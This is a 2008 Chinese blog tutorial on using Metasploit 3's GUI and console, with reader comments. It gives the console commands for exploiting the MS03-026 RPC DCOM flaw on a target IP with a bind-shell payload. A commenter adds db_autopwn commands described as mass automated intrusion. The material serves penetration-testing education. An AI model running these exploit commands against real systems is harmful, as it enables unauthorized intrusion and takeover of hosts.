注册 | 登录 忘记密码? 51cto首页 | 博客 | 论坛 | 招聘
热点文章 [业内传闻]今天,7月25日..
 帮助
“绿色IT 从我做起”7月获奖名单  负载均衡技术沙龙现场视频、PPT 博主的更多文章>>

Metasploit渗透工具的应用

2008-03-07 09:44:19
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://trustsec.blog.51cto.com/305338/64555
本文已发表在专家栏:
http://netsecurity.51cto.com/art/200803/66693.htm

【51CTO.com 专家特稿】在文章《Immunity canvas安全检测工具简介》 中,叶子对三个安全漏洞检测工具Metasploit、Immunity CANVAS、Core Impact中的Immunity CANVAS做了简单的安装使用介绍。现在叶子对Metasploit渗透工具的应用也做下说明。本文主要介绍Metasploit的GUI界面的简单使 用以及命令行模式下的使用。
Metasploit是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。
Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。
Metasploit的安装文件可以到官方网站进行下载,目前的版本是3.1。
http://metasploit.com/framework/
Metasploit 3的使用:(叶子使用windows系统上的Metasploit 3.0版本)
安装完Metasploit程序后,如下图1所示,程序中包含Metasploit的相关文档、常用的一些小工具(Netcat、Putty、 VNCViewer、WinVI)、CMD Shell、Metasploit 3的主程序、NASM Shell、上线升级程序、RUBY Shell等内容。下面我们开始使用Metasploit进行相关的渗透工作。
图1
1.安装完Metasploit程序,运行Metasploit 3,启动Web窗口界面,如下图2所示。界面中会出现Exploits、Auxiliaries、Payloads、Console、Sessions、About等图标栏。
图2
2.点击Exploits图标,系统列出所有的Exploits。
图3
3.针对目的主机的信息查找相关漏洞利用程序,比如查找Windows 2000系统的相关漏洞利用程序,如下图4所示:
图4
4.利用对主机扫描发现的漏洞信息,找到相关的漏洞利用程序,比如“Microsoft RPC DCOM Interface Overflow”的漏洞利用程序,如下图5所示。选择目的操作系统的种类。
图5
5.选择特定的ShellCode程序,系统攻击成功后,会执行相关的ShellCode的指令内容。比如选择绑定cmd Shell的操作,如下图所示:
图6
6.输入目的主机的IP地址,比如10.0.0.31,然后执行“Launch Exploit”按钮,如下图所示
图7
7.渗透攻击成功后,系统返回cmd shell信息,获取主机系统权限,可以做任何的操作了。如下图所示:
图8
除了使用web窗口模式来工作外,还可以使用MSF的命令模式,以Console平台来工作。
◆点击主窗口中的Console图标,如下图所示:
图9
◆输入Help命令,可以看到很多的操作命令,如下图所示。对于我们常用的命令也就是show、info、use、set等几个命令。
“show”:显示规定类型的一种模块或所有模块,比如exploit/payload等
“info”: 显示一种或更多模块的信息
“use”: 选择模块的名字
“set”: 设置变量
图10
◆通过输入“show exploits”指令查看有哪些可用的Exploit程序,如下图所示:
图11
◆输入“show payload”指令,查看有哪些可以加载的ShellCode信息,如下图所示:
图12
◆输入“info exploit/windows/dcerpc/ms03_026_dcom”指令,了解MS03_026_dcom利用程序的相关信息内容,如下图所示:
图13
◆根据了解的MS03_026_dcom的相关信息,使用漏洞利用程序。
输入:use exploit/windows/dcerpc/ms03_026_dcom
查看利用程序需要设置的相关内容
输入:show options
设置攻击目的主机的IP地址
输入:set RHOST 10.0.0.31
设置加载的ShellCode程序
输入:set PAYLOAD generic/shell_bind_tcp
执行利用程序
输入:exploit
系统攻击成功,并获取远程主机的权限,如下图所示:
图14
Metasploit会不定期更新可利用的漏洞程序,可以通过Online Update来进行升级。
由于Metasploit是国外的开源组织来维护,所以其中的exploit程序主要是针对国外语言的操作系统。对于中文操作系统的exploit程序,有些还需要进一步的修改。叶子会在以后的文章中来讨论怎样修改Metasploit的exploit程序内容。

本文出自 “叶子” 博客,请务必保留此出处http://trustsec.blog.51cto.com/305338/64555





    相关文章
浅谈国内安全公司的渗透评估过程
渗透一电信
渗透测试工具Immunity CANVAS使用安装简介
利用网站信息进行渗透攻击
黑客攻击:入侵渗透思路
Penetration Testing 渗透测试 (11%)
渗透工具hijack使用及下载
对Resin服务器的一次渗透
典型性社会工程学渗透实战
对Resin服务器的一次渗透
    文章评论
 
2008-03-07 10:24:33
要是真能修改Metasploit的exploit程序 那也太好了吧

2008-03-07 16:31:42
叶子老师你好,我一直在寻找这有关这款工具的研究,现在看您的这篇文章写的真的好棒,我真想能有这个软件件的一个专题书或文章该多好,我现在有个问题想向你问下,我的系统是XP的不在这样的系统下怎么才能实现象Linux平台一样可以实现自动扫漏洞与利用.这个问题我一直找不到答案.

2008-03-09 00:16:39
首先这个工具是开源的,所以有很多人研究。我这边也收集了一些前人的资料,有机会可以共享,而且我也计划多写一些关于这个工具的文章。你说的问题我不是很明白?Metsploit在Window上只提供漏洞的利用,没有提供扫描功能。至于实现自动扫描和利用,需要自己再编写一些脚本来组合使用!

2008-03-09 22:02:28
能得到叶子老师的回复,我已经很高兴的不得了了~谢谢您.恩我现在才明白原来还要编写脚本啊~我是在这个软件的主页上看到的到的一个教程~就是这个命令(db_autopwn),那是在Linux平台上实现的.听说是可以先用NMAP来扫描一个IP,然后就是开始用db_services命令来查看扫描结果,再用db_autopwn 测试漏洞.最后就实现了我所认为的自动扫描漏洞功能.其实我也不是特别明白,我的英文也不是特别好的~所以学习.叶子老师要是你能出本书该多好,如果出书的话我支持您.

2008-03-23 13:19:04
叶子同学研究还不够透彻呀,3.1版本已经支持windows下
大规模自动化入侵
msf>load db_sqlite3
msf>db_create
msf>db_nmap 192.168.0.100
msf>db_autopwn -p -e -x -r


db_import_nessus_nbe

2008-04-22 21:59:28
请问叶子老师,3.0版本在windows下怎么实现DB模块的连接,创建数据库啊??我都把那个postgresql数据库装起了,但就是db_create不了...总是出现一连串的错误...

 

发表评论

昵   称:
验证码:  点击图片可刷新验证码  博客过2级,无需填写验证码
内   容: